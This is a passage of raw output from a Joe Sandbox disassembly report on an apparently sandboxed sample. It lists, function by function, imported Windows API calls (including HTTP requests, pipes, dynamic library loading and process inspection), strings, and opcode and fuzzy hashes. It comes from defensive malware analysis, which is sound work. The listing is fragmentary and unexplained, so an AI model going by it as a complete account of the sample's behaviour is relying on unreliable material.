                                                                                                                • Instruction Fuzzy Hash: 12919D706083019FCB10EF24D58095ABBF5EF89710F15886EF88A8B352DB31E909CB72
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2
                                                                                                                • _memset.LIBCMT ref: 00D85E56
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 00D85E85
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D85F31
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D85F5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: 22c91bee26fb83c9ef05b811e55e9d0af26b2d55ffd487aa7ecda803c7b5216f
                                                                                                                • Instruction ID: 3e76466f25b9d70e0afa198abe74e1deea8576653327341ed2e4695706d641fd
                                                                                                                • Opcode Fuzzy Hash: 22c91bee26fb83c9ef05b811e55e9d0af26b2d55ffd487aa7ecda803c7b5216f
                                                                                                                • Instruction Fuzzy Hash: 8651CF71518702ABD715AB28EC45A6BB7E8EF85350F0C062DF995D31D4DB70CE4487B2
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D810B8
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D810EE
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D810FF
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D81181
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: 7e7249222bb1172e912c757c0e08614bcf600e618b3d1d2402cd7cafc0dbaf43
                                                                                                                • Instruction ID: 4835a39f3f387efae3eeea774b6f476b07ee7cfa9d30b49bb0145b894077bbd4
                                                                                                                • Opcode Fuzzy Hash: 7e7249222bb1172e912c757c0e08614bcf600e618b3d1d2402cd7cafc0dbaf43
                                                                                                                • Instruction Fuzzy Hash: D14188B5600305AFCB05DF55CC88BAA7BADEF44750F1480A9AA09DF205D7B1D94ACBB0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D85A93
                                                                                                                • GetMenuItemInfoW.USER32 ref: 00D85AAF
                                                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00D85AF5
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E018F0,00000000), ref: 00D85B3E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: 07e4dc475aba030f3a6e2ef18dcce98248ccb03eb149a8e63d6bd1526846ece0
                                                                                                                • Instruction ID: 84b2c7ed284155b4c88b81fe53b4712338b0036ca2ea6e2b46096c4e8a5e3187
                                                                                                                • Opcode Fuzzy Hash: 07e4dc475aba030f3a6e2ef18dcce98248ccb03eb149a8e63d6bd1526846ece0
                                                                                                                • Instruction Fuzzy Hash: C941A1312047029FD714AF24E880F5AB7E8EF95714F18462DF8A5972D5D770E800CB72
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00DA0478
                                                                                                                  • Part of subcall function 00D47F40: _memmove.LIBCMT ref: 00D47F8F
                                                                                                                  • Part of subcall function 00D4A2FB: _memmove.LIBCMT ref: 00D4A33D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$BuffCharLower
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 2411302734-567219261
                                                                                                                • Opcode ID: 95aa4dbb9db547afea3fba8761ecc4dbe484f485f2fb920ba1b991bcaeaeeb0e
                                                                                                                • Instruction ID: 95c4c43654a6c9b331fc843674d647fb8b1b6a6fc6d3533952fb76f1163a7499
                                                                                                                • Opcode Fuzzy Hash: 95aa4dbb9db547afea3fba8761ecc4dbe484f485f2fb920ba1b991bcaeaeeb0e
                                                                                                                • Instruction Fuzzy Hash: 29318174900619ABCF04EF58C8919FEB7B5FF15310B148A29E8629B2D5DB71E909CBB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D7C684
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D7C697
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D7C6C7
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 458670788-1403004172
                                                                                                                • Opcode ID: f8ad2767b119f7276e0d1526daf04a2b56b36ef2814bc2c80b97df6ed982082f
                                                                                                                • Instruction ID: 8fba354eaa77102a55516dacbf2b0ecaa90a0d81220fa3639cfede1623026267
                                                                                                                • Opcode Fuzzy Hash: f8ad2767b119f7276e0d1526daf04a2b56b36ef2814bc2c80b97df6ed982082f
                                                                                                                • Instruction Fuzzy Hash: 1F21F671940108BFDB049BA4CC86DFF7769DF05354B149129F426E31E1EB784D0A9670
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D94A60
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D94A86
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D94AB6
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D94AFD
                                                                                                                  • Part of subcall function 00D956A9: GetLastError.KERNEL32(?,?,00D94A2B,00000000,00000000,00000001), ref: 00D956BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1951874230-3916222277
                                                                                                                • Opcode ID: 53716943d0ed09d35b5335c423fa3d2c335133fe0f51e8e2c660169693d16539
                                                                                                                • Instruction ID: 5ef26a2c04e4161d2a6d8b3923a69c4a8246919d730e2431cfbe4197960a0418
                                                                                                                • Opcode Fuzzy Hash: 53716943d0ed09d35b5335c423fa3d2c335133fe0f51e8e2c660169693d16539
                                                                                                                • Instruction Fuzzy Hash: 3021CFB5640209BFEF12DF64DC84EBBB6EDEB49748F10412AF106E2241EA70CD068775
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB454E
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • _memset.LIBCMT ref: 00D43965
                                                                                                                • _wcscpy.LIBCMT ref: 00D439B5
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D439C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                • Opcode ID: e9cd4f27fa45097d22f58b3b3972e5850f89a534cfe3e2d4822c8507c027372a
                                                                                                                • Instruction ID: c1990aeed8cfa4aa5f618baacad3d7fb3ab58d69236ae115717b306948c64fb4
                                                                                                                • Opcode Fuzzy Hash: e9cd4f27fa45097d22f58b3b3972e5850f89a534cfe3e2d4822c8507c027372a
                                                                                                                • Instruction Fuzzy Hash: E731AF71008341AFD721EB64CC42FDA77E8EB58750F04451AF1C9921A1DB71AB8CCBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
                                                                                                                  • Part of subcall function 00D5C619: GetStockObject.GDI32(00000011), ref: 00D5C66B
                                                                                                                  • Part of subcall function 00D5C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DA8F69
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00DA8F70
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DA8F85
                                                                                                                • DestroyWindow.USER32(?), ref: 00DA8F8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: 74f6bb813935180c31a4e0ef622cc54ef14ff2b1d50311405b8e0372c66f8c53
                                                                                                                • Instruction ID: a54fef8494ab700bd8c3106f56358b3c9c1744e94a8683bf839b62bfb8540a69
                                                                                                                • Opcode Fuzzy Hash: 74f6bb813935180c31a4e0ef622cc54ef14ff2b1d50311405b8e0372c66f8c53
                                                                                                                • Instruction Fuzzy Hash: D121887120020AAFEF104E64DC80EBB7BAAEF4A324F144628FE5497190DB71DC90A770
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00D89E85
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D89EB6
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00D89EC8
                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00D89F02
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: d210a85ae4fa04550624734ea58ab01aefdc8198945d1469d322ebad2e520ba1
                                                                                                                • Instruction ID: a2c8ee564cd8f57a896b3de17e4607a6c3e455f20f650292cc8f4c0792b4ce02
                                                                                                                • Opcode Fuzzy Hash: d210a85ae4fa04550624734ea58ab01aefdc8198945d1469d322ebad2e520ba1
                                                                                                                • Instruction Fuzzy Hash: 91216D70500306ABDB21AF28DC15ABABBA8AF84324F284A19F8E5D72D0D770D941CB70
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00D89F50
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D89F80
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00D89F91
                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00D89FCB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: cca23d069f0c8f0108388321e7d499697740b60652f3a19d29cf4245f7fdbf4c
                                                                                                                • Instruction ID: 22e0e78206877370ba30ee08daace90bba06a79762b62833824ec54d375a2624
                                                                                                                • Opcode Fuzzy Hash: cca23d069f0c8f0108388321e7d499697740b60652f3a19d29cf4245f7fdbf4c
                                                                                                                • Instruction Fuzzy Hash: 162144715003069BDB24AF699C14EAAF7E8EF95724F280A19FAE1D72D0D770D941CB70
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00D8E392
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00D8E3E6
                                                                                                                • __swprintf.LIBCMT ref: 00D8E3FF
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00DDDBF0), ref: 00D8E43D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                • Opcode ID: 3290e6b0cb8a35ca354a80e34b80e61db97c9eb5ce519c97634756ee25edb39c
                                                                                                                • Instruction ID: c18468df1c0dac1d83007c341c1725aaf0aa066c1feb7f9a8c5d99ee63bfd1d3
                                                                                                                • Opcode Fuzzy Hash: 3290e6b0cb8a35ca354a80e34b80e61db97c9eb5ce519c97634756ee25edb39c
                                                                                                                • Instruction Fuzzy Hash: 7D214F35A40209AFCB10EF64CC85DAEB7B9EF49714B144069F509D7291D731DA05CB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                  • Part of subcall function 00D7D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D7D640
                                                                                                                  • Part of subcall function 00D7D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7D653
                                                                                                                  • Part of subcall function 00D7D623: GetCurrentThreadId.KERNEL32 ref: 00D7D65A
                                                                                                                  • Part of subcall function 00D7D623: AttachThreadInput.USER32(00000000), ref: 00D7D661
                                                                                                                • GetFocus.USER32 ref: 00D7D7FB
                                                                                                                  • Part of subcall function 00D7D66C: GetParent.USER32(?), ref: 00D7D67A
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00D7D844
                                                                                                                • EnumChildWindows.USER32(?,00D7D8BA), ref: 00D7D86C
                                                                                                                • __swprintf.LIBCMT ref: 00D7D886
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 1941087503-1110647743
                                                                                                                • Opcode ID: a5e192d2ec54fe802ef6973556808006d0037b226d38d4a908e3916b0f929c16
                                                                                                                • Instruction ID: a663e9f70a042a4b53711e0839dd5fc2ff6e28da879ec6ab5eacb5d70bf52b88
                                                                                                                • Opcode Fuzzy Hash: a5e192d2ec54fe802ef6973556808006d0037b226d38d4a908e3916b0f929c16
                                                                                                                • Instruction Fuzzy Hash: 2C11727154020A6BDB11BFA0DC85FEE377AEF44704F0480B9BE0DAA186EB745945DB71
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DA18E4
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DA1917
                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DA1A3A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00DA1AB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364364464-0
                                                                                                                • Opcode ID: e87c9ac9e15d16a17aea1df8e29e8060580d81e59c30a55aad44306a604fc76e
                                                                                                                • Instruction ID: eed4605c5e03e8cad8d219aaef9e17b8779dbd9e25b97739bfb9abb02882111b
                                                                                                                • Opcode Fuzzy Hash: e87c9ac9e15d16a17aea1df8e29e8060580d81e59c30a55aad44306a604fc76e
                                                                                                                • Instruction Fuzzy Hash: 52817F74A40215ABDF109F64C886BADBBE5EF45720F188059FD05AF382DBB4E9458BB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00DA05DF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00DA066E
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DA068C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00DA06D2
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 00DA06EC
                                                                                                                  • Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F282
                                                                                                                  • Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F2A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327935632-0
                                                                                                                • Opcode ID: e914ad3efd26c56cef62b04b1ac543c5ce34b2849166f55aa1d7be756b1e2e1e
                                                                                                                • Instruction ID: 33338dd942d293fa2e885776fe517b7010f6c0cb7f53fea88716ad968093613e
                                                                                                                • Opcode Fuzzy Hash: e914ad3efd26c56cef62b04b1ac543c5ce34b2849166f55aa1d7be756b1e2e1e
                                                                                                                • Instruction Fuzzy Hash: 7E514B75A00206DFCB00EFA8C894DADBBB5FF49310B188065EA55AB352DB34ED45CBB1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
